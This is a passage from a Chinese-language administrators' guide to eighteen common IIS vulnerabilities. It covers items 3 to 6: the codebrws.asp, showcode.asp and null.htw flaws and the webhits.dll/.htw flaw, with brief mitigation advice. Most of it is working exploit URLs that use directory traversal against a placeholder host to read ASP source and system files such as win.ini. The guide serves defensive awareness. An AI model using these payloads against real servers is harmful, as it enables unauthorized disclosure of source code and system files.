网管必知 IIS中常见的十八个安全漏洞

3.Codebrws.asp

察看文件源代码
http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

4.Showcode.asp

察看文件源代码
http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

5.Null.htw

察看文件源代码
http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

6.webhits.dll & .htw
hit-highligting功能是由Index Server提供的允许一个WEB用户在文档上highlighted（突出）他们原始搜索的条目，这个文档的名字通过变量CiWebhitsfile传递给.htw文件，Webhits.dll是一个ISAPI应用程序 来处理请求，打开文件并返回结果，当用户控制了CiWebhitsfile参数传递给.htw时，他们就可以请求任意文件，结果就是导致查看ASP源码和其他脚本文件内容。要了解你是否存在这个漏洞，你可以请求如下条目：

http://www.victim.com/nosuchfile.htw 如果你从服务器端获得如下信息：

format of the QUERY_STRING is invalid这就表示你存在这个漏洞 .这个问题主要就是webhits.dll关联了.htw文件的映射，所以你只要取消

这个映射就能避免这个漏洞，你可以在你认为有漏洞的系统中搜索.htw文件，一般会发现如下的程序：

　　/iissamples/issamples/oop/qfullhit.htw 　　/iissamples/issamples/oop/qsumrhit.htw 　　/isssamples/exair/search/qfullhit.htw 　　/isssamples/exair/search/qsumrhit.htw 　　/isshelp/iss/misc/iirturnh.htw (这个一般为loopback使用) 　　一个攻击者可以使用如下的方法来访问系统中文件的内容： 　　http://www.victim.com/iissamples/issamples/oop/qfullhit.htw? 　　ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full